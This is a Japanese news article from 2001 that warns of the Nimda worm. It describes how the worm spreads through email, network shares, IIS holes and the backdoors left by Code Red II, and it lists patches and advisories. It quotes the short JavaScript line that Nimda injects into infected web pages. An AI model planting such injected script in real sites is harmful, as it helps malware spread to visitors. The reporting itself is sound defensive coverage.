米CERT/CCやFBIのNIPC(National Infrastructure Protection Center:国家インフラ保護センター),およびアンチウイルス・ベンダー各社は9月18日に,新種のウイルス/ワーム「Nimda」を警告した。特徴は複数の感染手法を持つこと。サーバー,クライアントの区別なくすべてのWindowsマシンが対象となる,最高レベルの危険性のウイルスである。
Nimdaは,「Code Red」ワームなどと同じようにInternet Information Server/Services(IIS)サーバーに感染を広げるとともに,一般のウイルス同様,電子メールによっても感染を広げる。この場合,添付ファイルを開かなくても,本文を閲覧したりプレビューするだけで被害を受ける恐れがあるので事態は深刻である。また,感染したサーバーのWebページを閲覧するだけでも被害を受ける可能性がある。
サーバー管理者のみならず,全ユーザーがパッチを適用するなどの対策を施す必要がある。具体的には,「不適切な MIME ヘッダーが原因で Internet Explorer が電子メールの添付ファイルを実行する」のパッチを適用する。現在,被害は拡大中である。早急に対応しなければならない。
添付ファイルが勝手に実行される
Nimda は異なる手法で感染を広げていく。
(1)電子メールを介して,クライアントからクライアントへ
(2)ネットワーク共有を利用して,クライアントからクライアントへ
(3)IISのセキュリティ・ホールを突いて,クライアントからサーバーへ
(4)Code Red II ワームなどが残したバックドアを使って,クライアントからサーバーへ
(5)Webページの閲覧により,サーバーからクライアントへ
Nimda は「readme.exe」というファイル名で,HTMLメールに添付されて送られてくる。一般のウイルスならば,このファイルを実行しなければ被害を受けないが,Nimda は異なる。(a)HTMLメールの表示にInternet Explorer(IE)を使用するメール・ソフトを使っている場合(具体的にはOutlookやOutlook Expressなどを使用している場合),かつ(b)そのIE にセキュリティ・ホールがある場合には,メール本文を読もうとしたり,プレビューしたりするだけで,readme.exeが勝手に実行されてしまう(詳細については関連記事を参考にしてほしい)。
readme.exeが実行されると,Windowsのアドレス帳に記載されているすべてのメール・アドレスあてに,自身を添付したメールを送信して感染を広げる。メールの件名はランダムで本文はない。Nimda自身がメール送信機能を持っているので,メール・ソフトに送信履歴などは残らない。
さらに,ローカルおよびネットワーク共有されている,書き込み可能なすべてのディレクトリに,自分自身を「readme.eml」というファイル名でコピーする。セキュリティ・ホールのあるIEで,別のユーザーがこのファイルを閲覧などすると,メールの場合と同様に Nimda が実行される。
クライアントからサーバーへ感染,さらにサーバーからクライアントへ
Nimda の挙動はこれだけではない。クライアントからサーバーへも感染する。readme.exe あるいは readme.eml が実行されると,侵入感染するためのリクエストを,インターネット上のマシンに次々と送信する。対象が,セキュリティ・ホールが存在する IIS サーバーである場合,あるいは以前流行した「sadmind/IIS」ワームや「Code Red II」ワームが残すバックドア・ファイルが存在する場合には,侵入が“成功”する。
侵入後,自分自身を「readme.eml」というファイル名で,ローカル/リモートを問わずすべてのディレクトリにコピーする。同時に,そのサーバーのページを閲覧すると readme.eml が実行されるように,すべてのWeb関連ファイル(例えば,HTMLファイルやASPファイルなど)を改ざんする。具体的には,次のようなスクリプトを挿入する。
<script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script>
セキュリティ・ベンダーなどの情報によると,このページをブラウザで表示させると,readme.emlが別ウインドウで表示されるという。このとき,セキュリティ・ホールがあるIEでは,メールの場合と同様に,readme.emlに含まれるreadme.exeが勝手に実行されて,被害を受けることになる。
ただし,閲覧するだけでは被害を受けないとする情報もある。readme.exeがダウンロードされるだけなので,同ファイルを実行しなければ問題はないとしている。
被害は実際に報告されている。例えば,マイクロソフトのMSNサイトが感染し,同サイトを閲覧したユーザーに被害が出ているようだ([発表資料])。早急に対策を施す必要がある。
具体的には,「不適切な MIME ヘッダーが原因で Internet Explorer が電子メールの添付ファイルを実行する」のパッチを適用する。あるいは,IE 5.01 SP2 もしくは IE 5.5 SP2 にバージョンアップする。これは,すべてのWindowsユーザーが行う必要がある。なお,パッチを適用していても,readme.exeを実行してしまうと被害を受けるので注意すること。
【9月19日補足】「不適切な MIME ヘッダーが原因で Internet Explorer が電子メールの添付ファイルを実行する」パッチの対象はIE 5.5 SP1 あるいは IE 5.01 SP1 である。単なるIE 5.5/5.01 は対象外で,適用しようとすると「インストールする必要はない」といったメッセージが表示されてしまう。IE 5.5/5.01 ユーザーは,IE 5.01 SP2 もしくは IE 5.5 SP2 にバージョンアップする必要がある。IE のバージョンは「ヘルプ」メニューから確認できる([参考資料])。9月19日に公開されたIE 6([関連記事])も今回のセキュリティ・ホールはふさがれている。
【9月22日補足】 マイクロソフトはIE 6 においても,ウイルスを勝手に実行する場合があることを,同社の公開情報に追加した。IE 6 を最小構成でインストールした場合には,メール本文やWebページを見ただけで被害を受ける恐れがある。同社は Outlook Expressを含む標準構成以上でセットアップすることを強く勧めている([関連記事])。
IISサーバーに対しては,「IIS 用の累積的な修正プログラム」も適用してセキュリティ・ホールをふさぐ。併せて「sadmind/IIS」ワームや「Code Red II」ワームが残すバックドア・ファイルがないことを確認する。
さらに詳しい情報については,各セキュリティ・ベンダーや組織が公開している。ぜひ内容を確認してほしい。
◎参考資料
◆CERT Advisory CA-2001-26 Nimda Worm(米CERT)
◆Mass Mailing Worm W32.Nimda.A@mm(米National Infrastructure Protection Center)
◆W32.Nimda.A@mm(シマンテック)
◆W32.Nimda.A@mm(米Symantec)
◆新種ウイルス警報 VAC2「TROJ_NIMDA.A」
(トレンドマイクロ)
◆W32/Nimda@MM(日本ネットワークアソシエイツ)
◆Virus Alert: McAfee AVERT Assigns High-Outbreak Risk Assessment On Nimda Worm(米Network Associates)
◆新種のワームによるサーバーの被害とご利用者への影響について(マイクロソフト)
◆Nimda worm に関する情報(マイクロソフト)
◆新種ウイルス「W32/Nimda(仮称)」に関する情報(情報処理振興事業協会)
◆[JP290108]不適切な MIME ヘッダーが電子メールの添付ファイルを実行(マイクロソフト)
